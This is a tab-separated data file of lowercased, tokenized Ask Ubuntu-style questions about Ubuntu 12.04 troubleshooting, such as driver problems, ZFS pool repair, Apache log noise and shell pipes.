172539	problems with software install on ubuntu 12.04 lts	i 'm new to linux and am trying to upload some third party software as a learning exercise . i have followed the instructions to the letter . when running the installer bin file i 've been getting : ign http : //au.archive.ubuntu.com precise-backports inrelease err http : //security.ubuntu.com precise-security release.gpg something wicked happened resolving 'server : http ' ( -5 - no address associated with hostname ) messages similar to this occur many times until the install fails . any help would be greatly appreciated .
172544	rotate webcam video in empathy	i have a lenovo x220 tablet laptop with a built-in webcam , which is shown by lsusb as a chicony electronics co. , ltd device ( device id 04f2 : b217 ) . the uvcvideo kernel module is used as a driver for it . the webcam is working out-of-the-box under ubuntu 12.04 ( very nice ! ) , but the video is upside-down ( for example in empathy and when i open /dev/video0 with vlc ) . so how can i rotate the webcam video by 180째 degrees ? i would prefer an application-independent solution , because for example empathy seems to have no settings for this .
172552	screen resolution not proper in samsung n100s	i just got a samsung n100s notebook and installed ubuntu 12.04 . it looks like the resolution of screen is not coming properly . the system is taking 800x600 resolution - whereas i think it should be 1024*768 ( not sure though ) . is there a way to fix this ?
172554	why are my open files and applications closed automatically when i logout or shutdown ?	when i login back in ubuntu 12.04 , all my opened files are automatically closed and i have to open it from the first . why it happens so ? do i need to change any settings ? anyone , please help me to resolve this problem !
172555	12.04 64 bit and windows 7 dual boot	i am trying to install 12.04 alongside my existing install of windows 7 on my lenovo ideapad laptop . i decided to go for the 64-bit version since i have 6 gb of ram . i 've followed this guide to make sure everything worked properly and to use the windows 7 bootloader . however , even after following the guide all the way through , i am not able to start ubuntu in any way . when i choose ubuntu from the startup menu , i get to a command line version of grub ( if using easybcd default settings ) or an error ( if manually setting easybcd ) . i tried reinstalling ubuntu in any possible way : i shrank the windows partition with the win7 utility ; i tried letting the ubuntu installer create the partition or creating them manually as the guide specifies . nothing works and in no way i am able to start ubuntu . at this point , i still have 170 gb of space that i squeezed out of my hard drive and i can start over once again , but i think the guide i was trying to follow has something wrong , or i am missing something . can anybody point to a solution ?
172560	auto reply / auto responder for mail ?	i am looking for a ( freeware ) solution for auto reply/out of office reply on my ( web ) mail . i have done some googling but have n't found anything for this yet . does any know what program can do this ? my server runs on ubuntu 10.04 server . i have root/admin access .
172565	is there an equivalence to controlplance for mac ?	looking for a counterpart to controlplane that i run on os x ! controlplane is a gui for setting up custom actions in certain `` contexts '' . a context could be a certain ssid , a specific usb peripheral , a running application and so on . does such thing exist for ubuntu ?
172568	automatic android video backup on ubuntu one	how do i get my android videos to backup automatically ? pictures work great , but i have to do the videos manually .
172569	headless music converter with filename based on tags	i have a music collection consisting of several film soundtracks in apple lossless and i 'd like to convert it to 48kbps ogg vorbis in a completely different folder structure with file names in the following format : /music folder/ { album artist } / { album name } / { track number } { track title } - { track artist } .ogg i would also like to extract the album covers in a separate file called 'albumart.jpg ' in the same folder . the problem is i want to do this on my headless ubuntu server - so terminal only . is there any way to do this without some extensive script-writing ?
172570	how can i create a livecd/livedvd/liveusb ?	how can i create a ubuntu livecd/livedvd/liveusb ?
172572	how to backport a bug fix ?	i see a bugfix , that i need , in launchpad here for the package for cups , but , if i understand things correctly , it is built for 12.10 , and i am on 12.04 . is it still possible to install it ? if so , how can i do this ? is it unwise to install it ? will the fix eventually become available in the 12.04 updates if i can wait long enough , or am i forced to upgrade away from the lts version ?
172574	ca n't find connect to server ( smb ) on fresh ubuntu 12.04	i ca n't find the connect to server dialog that had the smb mount option ? was it removed ? is there an alternative ?
172577	replacing a disk in zpool	i am using ubuntu 12.04 & zfs native . i created a zpool using the /dev/disk/by-id method , but i can no longer import zpool . when i try zpool status command i get the error message `` no such pool `` when i try `` zpool import `` it finds the pool & shows that one disk is missing or unavailable . pool : tank id : 14496103743076187609 state : unavail status : one or more devices are missing from the system . action : the pool can not be imported . attach the missing devices and try again . see : http : //zfsonlinux.org/msg/zfs-8000-6x config : anas6tb unavail missing device sdf online sdh online additional devices are known to be part of this pool , though their exact configuration can not be determined . i have connected another drive of same size ( bad disk still in original place ) but i am having difficulty replacing bad disk with new one in zpool . i tried the following : sudo zpool replace tank /dev/sdg /dev/sde sudo zpool replace tank scsi-sata_st32000542as_9xw04yrp scsi-sata_st2000dm001-9yn_s240fe7c sudo zpool replace tank dev/sdg dev/sde i get the same error message each time `` can not open 'tank ' : no such pool '' i am obviously doing something wrong and would be grateful for any help .
172584	how to remove individual webapps from launcher	today my launcher looks like a long vertical bar of icons . i have 14 webapp icons on the launcher but there is no option to remove them or an option to no include them ( or even an option to merge them as i asked in a previous question ) . is there an option , without having to disable the whole webapp idea , to remove individual webapps from the launcher . forgot to add that the option to unlock from launcher does not appear , but only on the webapps . on the rest of the launcher icons it appears correctly . this is an image of the actual problem ( thanks to koma ) :
172585	internet proxy / usage monitoring server	i have a dell poweredge server and i want to make it into a whole site ( location ) proxy server so if anyone in the building uses our internet connection , they will have to go through this proxy to get out . i want to be able to block certain internet sites as well as monitor unproductive internet usage . ( search by user , date , time , site visited ... ) i would also like to restrict with username and password who is allowed to connect to the proxy . i have a poweredge server running ubuntu and an ethernet switch . do you know what hardware i need to do this and what software i need to be running and how to configure it ? it would also be nice if it had a nice web interface and/or gui to configure/search/monitor usage . i have already looked into squid , but it did n't seem like it did everything i am looking to do . maybe i am not configuring it correctly or i need other software to run along side it ?
172586	do i really need the `` source code '' in my repository list ?	it takes a long time to update my software sources when i run : sudo apt-get update i believe that happens when the apt-get is downloading source code from the repository , in my case it the one in ethiopia . it really slows down when it hits something similar to : http : //et.archive.ubuntu.org ... . i checked where i added that source and it was under the source code option . do i need the source code to be downloaded ? if not , can i un-check that option with out any consequences ?
172593	how to stop apache access.log grooving every few seconds ?	i installed a fresh ubuntu 12.04 server + zend server ce ( mysql / phpmyadmin ) from deb http : //repos.zend.com/zend-server/5.6.0_ubuntu1204/deb server non-free repository . my apache2/access.log looks like this and grooving every few seconds : : :1 - - [ 06/aug/2012:13:27:59 +0200 ] `` options * http/1.0 '' 200 126 `` - '' `` apache/2.2.22 ( ubuntu ) ( internal dummy connection ) '' : :1 - - [ 06/aug/2012:13:27:59 +0200 ] `` options * http/1.0 '' 200 126 `` - '' `` apache/2.2.22 ( ubuntu ) ( internal dummy connection ) '' : :1 - - [ 06/aug/2012:13:27:59 +0200 ] `` options * http/1.0 '' 200 126 `` - '' `` apache/2.2.22 ( ubuntu ) ( internal dummy connection ) '' : :1 - - [ 06/aug/2012:13:28:00 +0200 ] `` options * http/1.0 '' 200 126 `` - '' `` apache/2.2.22 ( ubuntu ) ( internal dummy connection ) '' : :1 - - [ 06/aug/2012:13:28:00 +0200 ] `` options * http/1.0 '' 200 126 `` - '' `` apache/2.2.22 ( ubuntu ) ( internal dummy connection ) '' : :1 - - [ 06/aug/2012:13:28:00 +0200 ] `` options * http/1.0 '' 200 126 `` - '' `` apache/2.2.22 ( ubuntu ) ( internal dummy connection ) '' : :1 - - [ 06/aug/2012:13:28:00 +0200 ] `` options * http/1.0 '' 200 126 `` - '' `` apache/2.2.22 ( ubuntu ) ( internal dummy connection ) '' : :1 - - [ 06/aug/2012:13:28:00 +0200 ] `` options * http/1.0 '' 200 126 `` - '' `` apache/2.2.22 ( ubuntu ) ( internal dummy connection ) '' 223.255.255.1 - - [ 06/aug/2012:13:28:08 +0200 ] `` head / http/1.1 '' 200 276 `` - '' `` - '' 223.255.255.1 - - [ 06/aug/2012:13:28:13 +0200 ] `` head / http/1.1 '' 200 276 `` - '' `` - '' 223.255.255.1 - - [ 06/aug/2012:13:28:18 +0200 ] `` head / http/1.1 '' 200 276 `` - '' `` - '' 223.255.255.1 - - [ 06/aug/2012:13:28:23 +0200 ] `` head / http/1.1 '' 200 276 `` - '' `` - '' 223.255.255.1 - - [ 06/aug/2012:13:28:28 +0200 ] `` head / http/1.1 '' 200 276 `` - '' `` - '' 223.255.255.1 - - [ 06/aug/2012:13:28:33 +0200 ] `` head / http/1.1 '' 200 276 `` - '' `` - '' 223.255.255.1 - - [ 06/aug/2012:13:28:38 +0200 ] `` head / http/1.1 '' 200 276 `` - '' `` - '' 223.255.255.1 - - [ 06/aug/2012:13:28:43 +0200 ] `` head / http/1.1 '' 200 276 `` - '' `` - '' 223.255.255.1 - - [ 06/aug/2012:13:28:48 +0200 ] `` head / http/1.1 '' 200 276 `` - '' `` - '' 223.255.255.1 - - [ 06/aug/2012:13:28:53 +0200 ] `` head / http/1.1 '' 200 276 `` - '' `` - '' 223.255.255.1 - - [ 06/aug/2012:13:28:58 +0200 ] `` head / http/1.1 '' 200 276 `` - '' `` - '' do you know why and how to prevent it ?
172601	ca n't upgrade from 11.10 to 12.04	in case you 're wondering , i 've already been through a few questions on the same topic here , and a bunch of threads on forums here and there . no solution seems to apply to my case . i have 11.10 currently installed on my machine . some time ago i received regularly notifications of upgrade to 12.04 . the release upgrade button showed up regularly in the update manager . but so far i have ignored all of this because i wanted to get back home before updating the system ( just in case i needed a second machine to repair an unsuccessful upgrade ) . so every time the notification window showed up i 've clicked on `` ask me later '' . now that i want to upgrade : 1 . the button is no longer in the update manager 2. sudo do-release-upgrade -d returns `` no new release found '' 3. sudo update-manager -- dist-upgrade returns `` your system is up-to-date '' apparently i can install normal updates , so i 'd rule connectivity issues out .
172602	how to use pipes to reference stdout of a command from within the stdin of another ?	i am trying to understand how to use the stdout as the stdin of another command . to test it , i am trying to use the following command to delete all directories from the current folder . ls -d -- */ | rm -rf $ 1 i would expect the result of ls -d -- */ to be piped into the input of the rm , but it does not work . ideas ?
172604	find files/folders in folder except some specific folders	i 'm trying to move all files from one folder to another , except some specific folders . i tried this to move all files except the .git , assets or build folders : find .. ! -regex '\ ( .git\|assets\|build\ ) ' | xargs mv -t ../build what i except this command to do : find all files/folders in parent folder that are not .git , assets or build . move those files/folders to ../build the folder structure is like this : . ├── application ├── assets ├── build ├── download_files ├── images ├── mybb ├── system └── tools my working directory is the tools folder . if i execute find .. ! -regex '\ ( .git\|assets\|build\ ) ' it still shows .git , assets and build . what 's wrong with my command ?
172607	instaling ubuntu 10.04 or later versions , on amd sempron	could i install ubuntu 10.04 i386 or later on my older computer ( amd sempron 2800+ , 768 mb ram , 80 gb hard drive ) ?
172609	how to disable discrete gpu using nvidia drivers ?	i have a dell studio xps 13 ( aka 1340 ) as of 12.04 most things run smoothly out of the box , but i have some power draining and warmness issues ( if not to be called terrible heat issues ) the system came with a nvidia geforce 9500m ( which has hybrid sli ) and it shows up in `` lspci '' as these 2 cards 02:00.0 vga compatible controller : nvidia corporation g98 [ geforce 9200m gs ] ( rev a1 ) 03:00.0 vga compatible controller : nvidia corporation c79 [ geforce 9400m g ] ( rev b1 ) i had to install nvidia-current over noveau driver 'cause noveau does freeze the system after suspension . by installing nvidia-current and running nvidia-xconfig the resume process after suspension is fixed . by the way both with nvidia-current and noveau the system drains a lot of battery and heats up a lot . i suppose this is because the discrete gpu is always on . i do n't really need 3d graphics on this system , if not the minimal to run unity and compiz for window management . so my question is : how do i disable , using nvidia-current , the discrete gpu 9200m and use only the integrated one 9400m ? notes : in bios i have no option to disable discrete gpu this i think is not applicable because of the suspension-freeze issue ( with noveau ) : https : //help.ubuntu.com/community/hybridgraphics i 've found this but i do n't know which -- sli option i should choose to fit my needs : http : //manpages.ubuntu.com/manpages/hardy/man1/nvidia-xconfig.1.html my system has not optimus or cuda , but anyone can tell me if bumblebee can work for me ?
172610	12.04 freeze frequently , may be related to mouse	my ubuntu12.04 often appears stuck - mouse , keyboard , all did not respond , everything stopped . i tried all methods to prove that indeed is a very serious problem . i know many people are like me , unfortunately , this problem still exist in 12.10 . i think the two most suspicious : 1 mouse . i do not use the mouse ( i use the laptop touchpad ) , and never had problems . i replaced a lot of mouse , but to no avail , as long as using the mouse , will such a situation occur from time to time . 2 usb . if it is not the mouse , it may be a usb problem . i use the mouse is a usb mouse . this problem is not caused by the graphics card , i used the open source drivers and private drivers , the problem will still occur . even installing the system will appear stuck . i installed for this purpose many operating systems , but to no avail . i believe this is a serious internal problem . the ubuntu11.10 and earlier on , have never encountered this problem . other linux versions can also run the normal , either 3.0,3.2,3.3 , or 3.4 kernel . i tried to upgrade the kernel 3.3.x and 3.4 , were unsuccessful , the situation still appears .
172611	sudden black screen while extracting rar ( 12.04 )	i was in the middle of extracting a rar file when my screen blacked out ( it looked like my screen when the power is off ) . i forced restart by pressing long on the power button of my laptop but it did n't restart . the icon notifications show that the laptop is on and it is connected to the adapter . is there anyway i can fix this without going to the service center ? i 'm using a thinkpad r61i ubuntu 12.04 64-bit 3.8gb ram 160gb hard drive .
172613	samsung new series 9 , not all function keys working	i bought the samsung new series 9 ultrabook ( np900x3c ) . i installed ubuntu 12.04 and the mainline 3.5 kernel . almost everything works perfectly , except some important function keys do n't work . the keys for the screen brightness and the keyboard backlit do n't work which is very annoying . i added manually a new keymap required for this notebook model ( guide : http : //jablonskis.org/2012/linux-and-samsung-series-laptop-9-fn-keys/ ) but the system does n't load them . i added the following lines to the udev rules : # /lib/udev/rules.d/95-keymap.rules env { dmi_vendor } == '' [ ss ] [ aa ] [ mm ] [ ss ] [ uu ] [ nn ] [ gg ] * '' , attr { [ dmi/id ] product_name } == '' *900x3* '' , run+= '' keymap $ name samsung-900x3c '' # /lib/udev/rules.d/95-keyboard-force-release.rules env { dmi_vendor } == '' [ ss ] [ aa ] [ mm ] [ ss ] [ uu ] [ nn ] [ gg ] * '' , attr { [ dmi/id ] product_name } == '' *900x3* '' , run+= '' keyboard-force-release.sh $ devpath samsung-900x3c '' the system is unable to load the dmi info which is required ( is it ? ) to select the correct keymap . the tool dmidecode returns the folling info : # dmidecode 2.11 # smbios entry point at 0xdac66000 smbios 2.7 present . 64 structures occupying 2917 bytes . table at 0x000e0840 . invalid entry length ( 0 ) . dmi table is broken ! stop . does anyone know how i can fix the dmi problem ( if this is a problem ) or how i can force udev to load my custom keymaps ?
172617	can not ping localhost after a half day of uptime	this just started like 4 or 5 days ago . i 'm running ubuntu 12.04 desktop , and after about 12 hours of uptime it seems the loopback device just stops working . if i do an ifconfig , it looks like it 's still there , but if i ping localhost or 127.0.0.1 , both fail . also , pinging known dns addresses ( www.google.com ) fail . but pinging by ip works fine . the rest of the networking features seem unphased . i can still reach the samba share from my windows machine . also , i run an apache server that is still reachable from the outside world . looking at the resources monitor , the cpu and memory usage appear normal when this happens . if i restart the machine , everything is fine again . for about 12 hours , until it happens again . any ideas on what could be causing this or how to diagnose it ? thanks . edit : i ran the recommended diagnostics commands . below is the output . i ca n't really make heads or tails of it though . does anything look out of the ordinary ? ~ $ ip addr 1 : lo : mtu 16436 qdisc noqueue state unknown link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo inet6 : :1/128 scope host valid_lft forever preferred_lft forever 2 : eth0 : mtu 1500 qdisc pfifo_fast state up qlen 1000 link/ether 00:1b : fc:64 : dc:82 brd ff : ff : ff : ff : ff : ff inet 192.168.1.132/24 brd 192.168.1.255 scope global eth0 inet6 fe80 : :21b : fcff : fe64 : dc82/64 scope link valid_lft forever preferred_lft forever ~ $ netstat -rn kernel ip routing table destination gateway genmask flags mss window irtt iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 0 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 ~ $ getent hosts localhost 127.0.0.1 localhost ~ $ ping 127.0.0.1 ping 127.0.0.1 ( 127.0.0.1 ) 56 ( 84 ) bytes of data . ^c -- - 127.0.0.1 ping statistics -- - 572 packets transmitted , 0 received , 100 % packet loss , time 575551ms ~ $ ping6 : :1 ping : :1 ( : :1 ) 56 data bytes 64 bytes from : :1 : icmp_seq=1 ttl=64 time=0.020 ms 64 bytes from : :1 : icmp_seq=2 ttl=64 time=0.023 ms 64 bytes from : :1 : icmp_seq=3 ttl=64 time=0.025 ms 64 bytes from : :1 : icmp_seq=4 ttl=64 time=0.021 ms 64 bytes from : :1 : icmp_seq=5 ttl=64 time=0.028 ms 64 bytes from : :1 : icmp_seq=6 ttl=64 time=0.025 ms 64 bytes from : :1 : icmp_seq=7 ttl=64 time=0.023 ms 64 bytes from : :1 : icmp_seq=8 ttl=64 time=0.026 ms 64 bytes from : :1 : icmp_seq=9 ttl=64 time=0.021 ms 64 bytes from : :1 : icmp_seq=10 ttl=64 time=0.028 ms ^c -- - : :1 ping statistics -- - 10 packets transmitted , 10 received , 0 % packet loss , time 8998ms rtt min/avg/max/mdev = 0.020/0.024/0.028/0.002 ms ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:1b : fc:64 : dc:82 inet addr:192.168.1.132 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :21b : fcff : fe64 : dc82/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:5537467 errors:0 dropped:0 overruns:0 frame:0 tx packets:7700200 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2390500721 ( 2.3 gb ) tx bytes:8274946292 ( 8.2 gb ) interrupt:23 base address:0x4000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1441430 errors:0 dropped:0 overruns:0 frame:0 tx packets:1441430 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:2084259522 ( 2.0 gb ) tx bytes:2084259522 ( 2.0 gb )
172618	how do i access the ubuntu source code ?	how do i obtain the source code for ubuntu 12.04 lts i386 32-bit ?
172619	pcsx not loading after new game start	i am running pcsx on ubuntu 12.04 64-bit , and i tried running chrono cross as an .iso file . as soon as i start the new game , the screen goes black and it does not load . any advice ? i installed pcsx from the software center . it freezes with all games . i will try the info from this and see what happens . it looks really helpful ... updates to follow .
172620	how to enable trash for nfs mounts ?	the /home/users directory on my host is an nfs mount connected to a server which is not in my control . when deleting files in $ home ( /home/users/foo ) with nautilus i get the following message : can not move file to trash , do you want to delete immediately ? the file `` ... '' can not be moved to the trash . is there some way to enable trash for this mount point ? i do n't have write access to the root of the partition i have write access to the partition , but even after creating the expected /home/users/.trash- $ ( id -u ) and setting the sticky bit , nautilus still fails to use the trash . when reading this question and the trash specification i found that $ home/.local/share/trash is the standard location ( unless $ xdg_data_home is set ) , and it looks like nautilus is only half-aware of this : it does indeed write a $ home/.local/share/trash/info/ [ filename ] < .number > .trashinfo every time i try to delete a file , but the files are all empty and i still keep getting the error message .
172624	no wireless internet connection ubuntu 12.04 lts	i just installed ubuntu on my dell latitude d820 . my `` wired '' network is working but i have no option for `` wireless '' connections . my computer has a `` nextreme bcm5752 gigabit ethernet pci express '' by broadcom . i am completely new to ubuntu and installed it over windows xp . i hope someone has a solution .
172629	how do i move all files from one folder to another using the command line ?	i would like to know how could i move all files from a folder to another folder with a command line . let 's say i 'm in my downloads folder and there are a 100 files that i would like to move to my videos folder , without having to write all the files name .
172630	how do i get a tata photon vme-102 usb modem working ?	my ubuntu 12.04 is unable to detect my tata photon vme-102 usb model but the same usb is working fine in windows . when i use the connection manager to create connection it shows that no usb is connected to the computer .
172637	good symbolic mathematics packages ?	i recently moved from mac os x to ubuntu , and i 'd like to ( as much as possible ) only use free software on my new machine . as a theoretical ecologist , i used to rely a lot on mathematica , and even though there is a linux version out there , i 'd really rather use something free . some people have mentionned maxima and sympy ( both are fine with me ) , but i 'd really love to hear about other alternatives , and people 's experiences with any of these packages .
172638	how to restore on another ubuntu computer a mysql backup made by rsnapshot ?	how to restore on another ubuntu computer a mysql database backup made by rsnapshot on an external usb hard disk ? this seems to be difficult because the uid and gid of mysql differ on both computers . i could work around by determining uid and gid of mysql on the target computer , copying the database in /var/log/mysql/ and running the command ~ $ chown -r newuser : newgroup newdir . is there a more straightforward solution ? [ backup on ubuntu 12.04 , restore on ubuntu 10.04.4 ]
172639	how can i overclock a pentium d cpu ?	i am trying to overclock an intel pentenium 4 dual core currently at 2.80 ghz , and was wondering what overclock i should put it at . when i use http : //www.cyberciti.biz/faq/ubuntu-cpu-information/ 's guide find out my specs , it comes up with this . input , $ cat /proc/cpuinfo output processor : 0 vendor_id : genuineintel cpu family : 15 model : 3 model name : intel ( r ) pentium ( r ) 4 cpu 2.80ghz stepping : 4 microcode : 0x17 cpu mhz : 2792.974 cache size : 1024 kb physical id : 0 siblings : 2 core id : 0 cpu cores : 1 apicid : 0 initial apicid : 0 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 5 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe constant_tsc pebs bts pni dtes64 monitor ds_cpl cid xtpr bogomips : 5585.94 clflush size : 64 cache_alignment : 128 address sizes : 36 bits physical , 32 bits virtual power management : processor : 1 vendor_id : genuineintel cpu family : 15 model : 3 model name : intel ( r ) pentium ( r ) 4 cpu 2.80ghz stepping : 4 microcode : 0x17 cpu mhz : 2792.974 cache size : 1024 kb physical id : 0 siblings : 2 core id : 0 cpu cores : 1 apicid : 1 initial apicid : 1 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 5 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe constant_tsc pebs bts pni dtes64 monitor ds_cpl cid xtpr bogomips : 5586.29 clflush size : 64 cache_alignment : 128 address sizes : 36 bits physical , 32 bits virtual power management : also , to find out how many cores , grep -c processor /proc/cpuinfo output 2
172641	trouble getting updates ubuntu 12.04	could someone help me decipher why i am getting this issue ? i 've tried updating my packages several times and i always get this same message with the update manager . things i 've already checked : i am connected to the internet ( as shown by my being able to post this question ) all other internet related things work fine , usc etc . i am running ubuntu 12.04 on a hp pavillion dv6000 , not dual booting . here 's a screenshot of my problem , have i missed a crucial update ? i 'd not have thought so seeing as it 's been roughly a week during which i did n't turn on my laptop , but if anyone has any idea/suggestions i 'd be grateful for any input .
172643	can juju be used in other region than the us ?	is there a way to bootstrap and/or deploy a server in amazon ec2 not in the us region ? in juju 's constraints , it seems that we can only choose region a , b , c or d which are in the us . thanks for help
172655	usb ethernet registered but not working	i have a cisco usb ethernet device plugged in to my 12.04lts . it shows up in lsusb as asix electronics corp. ax88772 and dmesg notes it : asix 5-1:1.0 : eth1 : register 'asix ' at usb-000:06:00.0-1 asix ax88772 usb 2.0 ethernet c0 : c1 : c0:94 : f7 : bd ( updating ... ) i see it listed in /etc/udev/rules.d/70-persistent-net.rules as ... # usb device 0x0b95:0x7720 ( usb ) subsystem== '' net '' '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' c0 : c1 : c0:94 : f7 : bd '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel= '' eth* '' , name= '' eth1 '' so usb has it , and part of the network system has it , but there is no eth1 in ifconfig and ifup eth1 says ignoring unknown interface eth1=eth1 how do i get it working ?
172659	how can i get awesome wm to recognize ~/.config/awesome/rc.lua ?	i 've been trying different configurations on awesome wm , but suddenly awesome stopped loading ~/.config/awesome/rc.lua on startup , and now only loads the default configuration at /etc/xdg/awesome/rc.lua . i tried starting from scratch and copying the default to ~/.config/awesome , but that did n't seem to work . what can be causing awesome to stop loading my custom file ? how do i even debug it ? i tried awesome -k and it says everything 's ok .
172660	launch two processes and return first process to the foreground so it can be killed with ctrl-c	i am launching two processes in a bash script : run_webserver xdg-open http : // $ ( hostname ) /dev-environment the run_webserver is an ongoing process , so i need to be able to kill it with ctrl-c . the xdg-open command simply launches a page in the browser . if i separate these commands with an ampersand ( & ) , the second process takes away `` focus '' from the first and i can no longer kill it with ctrl+c ... must instead look it up in ps and run kill -9 . any ideas ?
172664	recover directories just deleted in nautilus	in nautilus , i accidentally delete several directories on a partition ( unfortunately , i deleted them in a way such that they do n't remain in trash ) . i have n't write any new data to that partition yet . i wonder what ways are the best to recover them ? thanks ! the partition is ntfs , shared between windows 7 and ubuntu 12.04 .
172666	how do i fix my amd/ati gpu drivers ( temp is 83 c at idle ) ?	i am using a sager laptop with an amd radeon hd 6970m 256bit w/2gb gddr5 and an intelâž coreâ˘ i7-2720qm . when i boot to ubuntu 12 the cpu is fine and idles at a good temperature , but the gpu is in the high 70s and goes into the low 80s . i tried installing all the proprietary drivers and the post release updates failed to install . do i need to install catalyst ?
172674	can anyone recommend me a good to-do application ?	in previous ubuntu versions like 10.04 , we used to have evolution and its calendar/to-do options . now we have thunderbird and i am not sure whether i can have the same options on it . can anyone recommend me a good native application that offers calendar and to-do/organizing features ? i am in a serious need of some organization here . thanks .
172675	trouble installing nvidia gtx 560 se	the latest nvidia drivers claim support for this card , but when i try to install them , my computer wo n't boot . the card shows up in lspci as : vga compatible controller [ 0300 ] : nvidia corporation device [ 10de:1208 ] ( rev a1 ) the only way i can boot properly is setting the nomodeset boot option on . normally you would do that once in order to install the drivers , but once i install the drivers i can no longer boot and i am greeted with a blank screen . i 've also followed the instructions here , but they did n't help .
172677	can i have an alarm when a terminal becomes inactive ?	is there any way to have an alarm sound when a terminal becomes inactive or a process is asking for user input ? i have a process when needs user input very infrequently ( every few hours ) , and would like to leave it running , and hear an alarm when i need to return to the computer to input something .
172678	force a package to not upgrade	how can i force a package to stay at the current version , even though there 's an update ?
172679	apparmor denying a mount operation	how do i convince apparmor to allow this operation ? [ 28763.284171 ] type=1400 audit ( 1344273461.387:192 ) : apparmor= '' denied '' operation= '' mount '' info= '' failed type match '' error=-13 parent=7101 profile= '' lxc-container-with-nesting '' name= '' / '' pid=7112 comm= '' su '' flags= '' ro , remount , bind '' basically i 'm trying to remount the root filesystem read-only ( in a mount namespace nested in an lxc container ) . the setup is a few bind mounts around the place ending with : mount -- rbind / / mount -o remount , ro / i tried every combination of : mount options= ( ro , remount , bind ) / - > / , i could think of . adding the rule audit mount , shows all the other mounts i do , but not the ones operating on / . the closest i can get is mount - > / , which imho is too loose . even mount / - > / , denies the remount ( while the first bind mount is allowed ) .
172685	lubuntu alternate and ubuntu minimal install hangs	i 'm trying to install lubuntu/ubuntu minimal on an old machine from usb but the install hangs right after choosing how to partition . i have tried both lubuntu an ubuntu minimal install . any suggestions on how to solve this ? maby there is some old files on the hdd causing the problem , if that is the case how can i prepare it for install ? thanks
172687	why is every input field purple ?	in every app , every place where you 'd expect there to be white , like the background of search boxes or the margins of documents the background is purple instead . now , i happen to think purple is a fine color , but i do n't remember making a setting like this . it makes my machine look ridiculous . examples : i ca n't find a place to change this color . what is this setting even called ? any ideas ? this was an upgrade from 11.10 to 12.04 . i am currently using the ambiance theme , although changing the theme does n't seem to matter . i am using unity2d right now because of problems with my nvidia driver with 12.04 . the color issue was still there even when i was using regular unity .
172690	how to not wipe the whole disk , only the partition i want ubuntu on ?	i have in my old laptop , one harddisk which is split in two equal sized partitions . partition c got the windows xp boot and some odd files that i do n't care much for since i always do a backup regularly of the c partition . the other partition , d is seldom backupped , as i do know a new windows installation do not affect the d partition , it only wipe the c and reinstalls there . my question is therefore : when i see the screenshots of the ubuntu installation process , i see the option to wipe the disk and install ubuntu . does that mean it wipes both of my partitions , or is there an expert option somewhere that allows me to wipe only the c partition , and keep the d partition untouched , and i would still have full access to my photos and other files there ? thank you : )
172691	why is my battery indicator wrong on samsung series 9 ?	i have a samsung series 9 np900x4c-a01us dual booting windows 8 and ubuntu 12.04 . on windows 8 , the battery indicator is completely correct . when i plug in my ac adapter , it says charging , and when i unplug it , it gives me an estimate of how much my battery will last . on ubuntu 12.04 , the battery indicator remains whatever the state was at startup . that is , if i had my ac adapter plugged in during startup , even if i unplug it , the indicator still shows charging . the laptop has a built-in battery charging indicator , and that light is correct . this was working about a week ago on 12.04 , and i do n't really know what has changed since then . i did a complete reinstall of ubuntu 12.04 and the problem persisted .
172696	lenovo s10-3 does n't wake from suspend	i know some similar questions have been asked here before , and i have used google , but none of the methods i 've found have worked for me . i was really seriously thinking about switching to ubuntu on my netbook ( i ca n't do it on my desktop , i use professional tools and i 'm also a gamer ) but i also need that function to live . it just suspends and then when i try to wake it , the power battery and hdd lights turns on , then hdd disappears and it is stuck with the black screen , the only way to exit it is by holding power button for few seconds or removing battery . i 'm on 12.04 64-bit .
172698	how do i install sublime text 2/3 ?	i installed sublime text 2 on 12.04 as per this tutorial . however i do n't have adequate permissions when launching the program from the unity launcher . for example i can not install packages , or if i add a folder to the sidebar when i close sublime and reopen , the folder is no longer listed . if i run sudo sublime in the terminal all changes remain after closing . i 've tried chown-ing the sublime text 2 folder in usr/lib sudo chown -r mylogin : mylogin /usr/lib/ '' sublime text 2 '' but this seemed to have no effect .
172702	how do i get the kde plasmanetbook ?	recently i came across http : //www.kde.org/workspaces/plasmanetbook/ and saw several screen shots ot the plasma netbook .. i have been using kde plasma desktop but this one looks great .. my question is how do i get it in ubuntu ? ? ? ? or are there any other destros that comes preinstalled with that plasmanetbook as my ubuntu is running very well and i dont want to mess things up ? ? ? thank you
172703	problem at downloading from ubuntu software center ?	i have 12.04 . the problem is that when downloading and installing from the software center is almost finished , i get this error message : installing software package failed . it happens to me every time i 'm installing a software , so no software that i decided to install from ubuntu software center is installed on my pc . please help .
172705	how do i install the opus audio encoder ?	i would like to try out the opus audio encoder , but ca n't find it in the repositories . can anyone here help me get it installed on my computer ? i have some wav files which i would like to convert to the opus audio format . however , i have found this link , but each time i click on the appropriate deb download , the package manager opens , but displays an error message saying that there are dependency issues ( lib0gg0 ) .
